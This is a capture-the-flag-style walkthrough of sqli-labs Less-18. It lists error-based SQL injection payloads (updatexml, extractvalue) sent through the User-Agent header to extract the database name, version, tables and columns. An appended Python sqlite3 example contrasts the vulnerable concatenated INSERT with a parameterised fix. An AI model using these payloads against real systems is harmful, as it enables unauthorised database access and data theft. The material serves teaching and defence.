sqli-labs less 18
reader-l 'or updatexml(1,concat('#',(select user()),1),1)
First, use this payload to get a rough idea of the back-end INSERT statement:
$insert="INSERT INTO security.uagents (uagent, ip_address, username) VALUES ('$uagent', '$IP', $uname)";
So the following statements are used to inject and enumerate the data:
user-agent:reader-l ' or updatexml(1,concat('#',(database())),0),'','')#
reader-l 'or updatexml(1,concat('#',(select concat(table_name) from information_schema.tables where table_schema='security' limit 0,1 ),'#'),0),1)#
reader-l 'or updatexml(1,concat('#',(select concat(column_name) from information_schema.columns where table_name='users' limit 0,1 ),'#'),0),1)#
reader-l ' or updatexml(1,concat('#',(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),0),'','')#
'and extractvalue(1,concat(0x7e,(select @@version),0x7e)) and '1' = '1
reader-l 'and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e)) and '1' = '1
An expert has explained this in great detail; here is the link: https://www.jianshu.com/p/7494c1027abf
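Why the User-Agent header reaches the SQL parser in the INSERT above, and how a bound parameter stops it, as an added example that is not code from the original post or from sqli-labs. It assumes Python's sqlite3 as an offline stand-in for MySQL (so the XML-function error leak itself does not occur), and the table layout and function names are illustrative.

```python
import sqlite3

# Constructed sample input: the User-Agent value used in the walkthrough above.
PAYLOAD = "reader-l ' or updatexml(1,concat('#',(database())),0),'','')#"


def make_db():
    """In-memory stand-in for the lab's security.uagents table (assumed layout)."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE uagents (uagent TEXT, ip_address TEXT, username TEXT)"
    )
    return db


def insert_concatenated(db, uagent, ip, uname):
    """Same pattern as the lab's $insert: the header is pasted into the SQL text."""
    sql = (
        "INSERT INTO uagents (uagent, ip_address, username) "
        f"VALUES ('{uagent}', '{ip}', '{uname}')"
    )
    try:
        db.execute(sql)
        return "stored"
    except sqlite3.Error as exc:
        # The quote inside the header closed the string literal, so everything
        # after it was handed to the SQL parser instead of being stored as data.
        return f"parsed-as-sql: {exc}"


def insert_bound(db, uagent, ip, uname):
    """Hardened form: values travel as bound parameters, never as SQL text."""
    db.execute(
        "INSERT INTO uagents (uagent, ip_address, username) VALUES (?, ?, ?)",
        (uagent, ip, uname),
    )
    return "stored"


def stored_agents(db):
    """Return the uagent column in insertion order."""
    return [row[0] for row in db.execute("SELECT uagent FROM uagents")]


if __name__ == "__main__":
    db = make_db()
    print(insert_concatenated(db, PAYLOAD, "127.0.0.1", "admin"))
    print(insert_bound(db, PAYLOAD, "127.0.0.1", "admin"))
    print(stored_agents(db))
```

In the PHP lab the equivalent fix is a prepared statement with bound parameters for `$uagent`, `$IP` and `$uname`, combined with not echoing database errors back to the client.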